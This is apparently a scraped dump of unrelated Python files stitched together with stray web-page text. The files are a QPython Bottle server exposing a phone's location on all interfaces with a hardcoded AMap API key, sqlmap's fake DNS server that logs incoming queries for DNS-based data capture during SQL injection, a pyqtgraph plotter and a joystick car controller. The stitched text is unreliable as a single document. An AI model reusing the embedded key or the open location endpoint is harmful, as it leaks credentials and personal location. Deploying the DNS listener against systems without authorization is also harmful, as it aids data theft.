class MyWSGIRefServer(ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
#sys.stderr.close()
import threading
threading.Thread(target=self.server.shutdown).start()
#self.server.shutdown()
self.server.server_close() #<--- alternative but causes bad fd exception
print ("# qpyhttpd stop")
def __exit():
Droid.stopLocating()
global server
server.stop()
def __ping():
return "ok"
def index():
Droid.vibrate()
return """<html><body>
<button onclick='location.href="/hello"'>显示我在哪里</button>
<img style="-webkit-user-select: none;" src="https://restapi.amap.com/v3/staticmap?location=118.391761,35.023749000000002&zoom=10&size=750*300&markers=mid,,A:118.391761,35.023749000000002&key=3975f37408a3ab4904502e3630639014">
</body></html>"""
#详见JavaScript的location对象属性
def hello():
location = Droid.getLastKnownLocation().result
location = location.get('network', location.get('gps'))
#location = {"latitude":"116.387884","longitude":"39.929986"}
return template(root+'/baidu.tpl',lat=location['latitude'],lng=location['longitude'])
"""以前用过的前端页面都是.html格式的,现在出现了.tpl文件,是template的缩写,发现他就是前端页面,写的也是html。
应该是前端模板Smarty的一个格式。【就是一个文本文件】可以在Dreamviewer中打开,进行可视化编辑。应该也可以使用PS打开。"""
if __name__ == '__main__':
app = Bottle()
app.route('/', method='GET')(index)
app.route('/hello', method='GET')(hello)
app.route('/__exit', method=['GET','HEAD'])(__exit)
app.route('/__ping', method=['GET','HEAD'])(__ping)
try:
server = MyWSGIRefServer(host="0.0.0.0", port="8080")#这样通过电脑也能访问
app.run(server=server,reloader=False)
except Exception as ex:
print ("Exception: %s" % repr(ex))
|
dns.py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import os
import re
import socket
import threading
import time
class DNSQuery(object):
"""
Used for making fake DNS resolution responses based on received
raw request
Reference(s):
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
"""
def __init__(self, raw):
self._raw = raw
self._query = ""
type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits
if type_ == 0: # Standard query
i = 12
j = ord(raw[i])
while j != 0:
self._query += raw[i + 1:i + j + 1] + '.'
i = i + j + 1
j = ord(raw[i])
def response(self, resolution):
"""
Crafts raw DNS resolution response packet
"""
retVal = ""
if self._query:
retVal += self._raw[:2] # Transaction ID
retVal += "\x85\x80" # Flags (Standard query response, No error)
retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00" # Questions and Answers Counts
retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)] # Original Domain Name Query
retVal += "\xc0\x0c" # Pointer to domain name
retVal += "\x00\x01" # Type A
retVal += "\x00\x01" # Class IN
retVal += "\x00\x00\x00\x20" # TTL (32 seconds)
retVal += "\x00\x04" # Data length
retVal += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP
return retVal
class DNSServer(object):
def __init__(self):
self._check_localhost()
self._requests = []
self._lock = threading.Lock()
try:
self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)
except AttributeError:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(("", 53))
self._running = False
self._initialized = False
def _check_localhost(self):
response = ""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("", 53))
s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex")) # A www.google.com
response = s.recv(512)
except:
pass
finally:
if response and "google" in response:
raise socket.error("another DNS service already running on *:53")
def pop(self, prefix=None, suffix=None):
"""
Returns received DNS resolution request (if any) that has given
prefix/suffix combination (e.g. prefix.<query result>.suffix.domain)
"""
retVal = None
with self._lock:
for _ in self._requests:
if prefix is None and suffix is None or re.search(r"%s\..+\.%s" % (prefix, suffix), _, re.I):
retVal = _
self._requests.remove(_)
break
return retVal
def run(self):
"""
Runs a DNSServer instance as a daemon thread (killed by program exit)
"""
def _():
try:
self._running = True
self._initialized = True
while True:
data, addr = self._socket.recvfrom(1024)
_ = DNSQuery(data)
self._socket.sendto(_.response("127.0.0.1"), addr)
with self._lock:
self._requests.append(_._query)
except KeyboardInterrupt:
raise
finally:
self._running = False
thread = threading.Thread(target=_)
thread.daemon = True
thread.start()
if __name__ == "__main__":
server = None
try:
server = DNSServer()
server.run()
while not server._initialized:
time.sleep(0.1)
while server._running:
while True:
_ = server.pop()
if _ is None:
break
else:
print("[i] %s" % _)
time.sleep(1)
except socket.error as ex:
if 'Permission' in str(ex):
print("[x] Please run with sudo/Administrator privileges")
else:
raise
except KeyboardInterrupt:
os._exit(0)
finally:
if server:
server._running = False
|
function_plot.py
|
# Copyright(c) 2020 Max Planck Gesellschaft
# Author: Vincent Berenz
from pyqtgraph.Qt import QtGui, QtCore, QtWidgets
import pyqtgraph as pg
from collections import deque
import threading,math,time
pg.setConfigOptions(antialias=True)
class _Channel:
__slots__=["_get_function",
"_color",
"_curve",
"_data",
"_plot",
"_first"]
def __init__(self,get_function,color,data_size,limits):
self._get_function = get_function
self._color = color
self._data = deque([limits[0]]*data_size,data_size)
self._data[1]=limits[1]
self._curve = None
self._first = True
def get_color(self):
return self._color
def stop(self):
self._plot.close()
def set_curve(self,curve,plot):
self._curve = curve
self._plot = plot
def update(self):
v = self._get_function()
if v is not None:
self._data.append(v)
self._curve.setData(self._data)
if self._first:
self._plot.enableAutoRange('xy', False)
self._first=False
class _Subplot:
__slots__= ["_channels","_limits","_data_size"]
def __init__(self,limit_min,limit_max,data_size):
self._data_size = data_size
self._channels = []
self._limits = (limit_min,limit_max)
def add_channel(self,channel):
self._channels.append(channel)
def add_channels(self,function_colors):
for function,color in function_colors:
self._channels.append(_Channel(function,
color,self._data_size,
self._limits))
def get_channels(self):
return self._channels
class Plot():
def __init__(self,
title,
period,
windows_size):
self._title = title
self._period = period
self._subplots = []
self._windows_size = windows_size
self._timer = None
def add_subplot(self,limits,data_size,function_colors):
subplot = _Subplot(limits[0],limits[1],data_size)
subplot.add_channels(function_colors)
self._subplots.append(subplot)
def _update(self):
for subplot in self._subplots:
for channel in subplot.get_channels():
channel.update()
def _setup(self):
self._application = QtGui.QApplication([])
self._win = pg.GraphicsWindow(title=self._title)
self._win.resize(*self._windows_size)
self._win.setWindowTitle(self._title)
self._timer = QtCore.QTimer()
self._timer.timeout.connect(self._update)
self._timer.start(self._period)
for subplot in self._subplots:
p = self._win.addPlot()
for channel in subplot.get_channels():
curve = p.plot(pen=channel.get_color())
channel.set_curve(curve,p)
self._win.nextRow()
def stop(self):
self._application.quit()
self._thread.join()
def _run(self):
self._setup()
self._application.exec_()
def start(self):
self._thread = threading.Thread(target=self._run)
self._thread.start()
|
joystick.py
|
import os
import array
import time
import math
import struct
from threading import Thread
class Joystick():
'''
An interface to a physical joystick available at /dev/input
'''
def __init__(self, dev_fn='/dev/input/js0'):
self.axis_states = {}
self.button_states = {}
self.axis_map = []
self.button_map = []
self.jsdev = None
self.dev_fn = dev_fn
# These constants were borrowed from linux/input.h
self.axis_names = {
0x00 : 'x',
0x01 : 'y',
0x02 : 'z',
0x03 : 'rx',
0x04 : 'ry',
0x05 : 'rz',
0x06 : 'trottle',
0x07 : 'rudder',
0x08 : 'wheel',
0x09 : 'gas',
0x0a : 'brake',
0x10 : 'hat0x',
0x11 : 'hat0y',
0x12 : 'hat1x',
0x13 : 'hat1y',
0x14 : 'hat2x',
0x15 : 'hat2y',
0x16 : 'hat3x',
0x17 : 'hat3y',
0x18 : 'pressure',
0x19 : 'distance',
0x1a : 'tilt_x',
0x1b : 'tilt_y',
0x1c : 'tool_width',
0x20 : 'volume',
0x28 : 'misc',
}
self.button_names = {
0x120 : 'trigger',
0x121 : 'thumb',
0x122 : 'thumb2',
0x123 : 'top',
0x124 : 'top2',
0x125 : 'pinkie',
0x126 : 'base',
0x127 : 'base2',
0x128 : 'base3',
0x129 : 'base4',
0x12a : 'base5',
0x12b : 'base6',
#PS3 sixaxis specific
0x12c : "triangle",
0x12d : "circle",
0x12e : "cross",
0x12f : 'square',
0x130 : 'a',
0x131 : 'b',
0x132 : 'c',
0x133 : 'x',
0x134 : 'y',
0x135 : 'z',
0x136 : 'tl',
0x137 : 'tr',
0x138 : 'tl2',
0x139 : 'tr2',
0x13a : 'select',
0x13b : 'start',
0x13c : 'mode',
0x13d : 'thumbl',
0x13e : 'thumbr',
0x220 : 'dpad_up',
0x221 : 'dpad_down',
0x222 : 'dpad_left',
0x223 : 'dpad_right',
# XBox 360 controller uses these codes.
0x2c0 : 'dpad_left',
0x2c1 : 'dpad_right',
0x2c2 : 'dpad_up',
0x2c3 : 'dpad_down',
}
def init(self):
from fcntl import ioctl
'''
call once to setup connection to dev/input/js0 and map buttons
'''
# Open the joystick device.
print('Opening %s...' % self.dev_fn)
self.jsdev = open(self.dev_fn, 'rb')
# Get the device name.
buf = array.array('B', [0] * 64)
ioctl(self.jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
self.js_name = buf.tobytes().decode('utf-8')
print('Device name: %s' % self.js_name)
# Get number of axes and buttons.
buf = array.array('B', [0])
ioctl(self.jsdev, 0x80016a11, buf) # JSIOCGAXES
self.num_axes = buf[0]
buf = array.array('B', [0])
ioctl(self.jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
self.num_buttons = buf[0]
# Get the axis map.
buf = array.array('B', [0] * 0x40)
ioctl(self.jsdev, 0x80406a32, buf) # JSIOCGAXMAP
for axis in buf[:self.num_axes]:
axis_name = self.axis_names.get(axis, 'unknown(0x%02x)' % axis)
self.axis_map.append(axis_name)
self.axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(self.jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:self.num_buttons]:
btn_name = self.button_names.get(btn, 'unknown(0x%03x)' % btn)
self.button_map.append(btn_name)
self.button_states[btn_name] = 0
return True
def show_map(self):
'''
list the buttons and axis found on this joystick
'''
print ('%d axes found: %s' % (self.num_axes, ', '.join(self.axis_map)))
print ('%d buttons found: %s' % (self.num_buttons, ', '.join(self.button_map)))
def poll(self):
'''
query the state of the joystick, returns button which was pressed, if any,
and axis which was moved, if any. button_state will be None, 1, or 0 if no changes,
pressed, or released. axis_val will be a float from -1 to +1. button and axis will
be the string label determined by the axis map in init.
'''
button = None
button_state = None
axis = None
axis_val = None
# Main event loop
evbuf = self.jsdev.read(8)
if evbuf:
tval, value, typev, number = struct.unpack('IhBB', evbuf)
if typev & 0x80:
#ignore initialization event
return button, button_state, axis, axis_val
if typev & 0x01:
button = self.button_map[number]
if button:
self.button_states[button] = value
button_state = value
if typev & 0x02:
axis = self.axis_map[number]
if axis:
fvalue = value / 32767.0
self.axis_states[axis] = fvalue
axis_val = fvalue
return button, button_state, axis, axis_val
class JoystickController(object):
'''
Joystick client using access to local physical input
'''
def __init__(self, poll_delay=0.0166,
max_throttle=1.0,
steering_axis='x',
throttle_axis='rz',
steering_scale=1.0,
throttle_scale=-1.0,
dev_fn='/dev/input/js0',
auto_record_on_throttle=True):
self.angle = 0.0
self.throttle = 0.0
self.mode = 'user'
self.poll_delay = poll_delay
self.running = True
self.max_throttle = max_throttle
self.steering_axis = steering_axis
self.throttle_axis = throttle_axis
self.steering_scale = steering_scale
self.throttle_scale = throttle_scale
self.recording = False
self.constant_throttle = False
self.auto_record_on_throttle = auto_record_on_throttle
#init joystick
self.js = Joystick(dev_fn)
self.js.init()
#start thread to poll it
self.thread = Thread(target=self.update)
self.thread.setDaemon(True)
self.thread.start()
def on_throttle_changes(self):
'''
turn on recording when non zero throttle in the user mode.
'''
if self.auto_record_on_throttle:
self.recording = (self.throttle != 0.0 and self.mode == 'user')
def update(self):
'''
poll a joystick for input events
button map name => PS3 button => function
* top2 = PS3 dpad up => increase throttle scale
* base = PS3 dpad down => decrease throttle scale
* base2 = PS3 dpad left => increase steering scale
* pinkie = PS3 dpad right => decrease steering scale
* trigger = PS3 select => switch modes
* top = PS3 start => toggle constant throttle
* base5 = PS3 left trigger 1
* base3 = PS3 left trigger 2
* base6 = PS3 right trigger 1
* base4 = PS3 right trigger 2
* thumb2 = PS3 right thumb
* thumb = PS3 left thumb
* circle = PS3 circrle => toggle recording
* triangle = PS3 triangle => increase max throttle
* cross = PS3 cross => decrease max throttle
'''
while self.running:
button, button_state, axis, axis_val = self.js.poll()
if axis == self.steering_axis:
self.angle = self.steering_scale * axis_val
print("angle", self.angle)
if axis == self.throttle_axis:
#this value is often reversed, with positive value when pulling down
self.throttle = (self.throttle_scale * axis_val * self.max_throttle)
print("throttle", self.throttle)
self.on_throttle_changes()
if button == 'trigger' and button_state == 1:
'''
switch modes from:
user: human controlled steer and throttle
local_angle: ai steering, human throttle
local: ai steering, ai throttle
'''
if self.mode == 'user':
self.mode = 'local_angle'
elif self.mode == 'local_angle':
self.mode = 'local'
else:
self.mode = 'user'
print('new mode:', self.mode)
if button == 'circle' and button_state == 1:
'''
toggle recording on/off
'''
if self.auto_record_on_throttle:
print('auto record on throttle is enabled.')
elif self.recording:
self.recording = False
else:
self.recording = True
print('recording:', self.recording)
if button == 'triangle' and button_state == 1:
'''
increase max throttle setting
'''
self.max_throttle = round(min(1.0, self.max_throttle + 0.05), 2)
if self.constant_throttle:
self.throttle = self.max_throttle
self.on_throttle_changes()
print('max_throttle:', self.max_throttle)
if button == 'cross' and button_state == 1:
'''
decrease max throttle setting
'''
self.max_throttle = round(max(0.0, self.max_throttle - 0.05), 2)
if self.constant_throttle:
self.throttle = self.max_throttle
self.on_throttle_changes()
print('max_throttle:', self.max_throttle)
if button == 'base' and button_state == 1:
'''
increase throttle scale
'''
self.throttle_scale = round(min(0.0, self.throttle_scale + 0.05), 2)
print('throttle_scale:', self.throttle_scale)
if button == 'top2' and button_state == 1:
'''
decrease throttle scale
'''
self.throttle_scale = round(max(-1.0, self.throttle_scale - 0.05), 2)
print('throttle_scale:', self.throttle_scale)
if button == 'base2' and button_state == 1:
'''
increase steering scale
'''
self.steering_scale = round(min(1.0, self.steering_scale + 0.05), 2)
print('steering_scale:', self.steering_scale)
if button == 'pinkie' and button_state == 1:
'''
decrease steering scale
'''
self.steering_scale = round(max(0.0, self.steering_scale - 0.05), 2)
print('steering_scale:', self.steering_scale)
if button == 'top' and button_state == 1:
'''
toggle constant throttle
'''
if self.constant_throttle:
self.constant_throttle = False
self.throttle = 0
self.on_throttle_changes()
else:
self.constant_throttle = True
self.throttle = self.max_throttle
self.on_throttle_changes()
print('constant_throttle:', self.constant_throttle)
time.sleep(self.poll_delay)
def run_threaded(self, img_arr=None):
self.img_arr = img_arr
return self.angle, self.throttle, self.mode, self.recording
def shutdown(self):
self.running = False
time.sleep(0.5)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.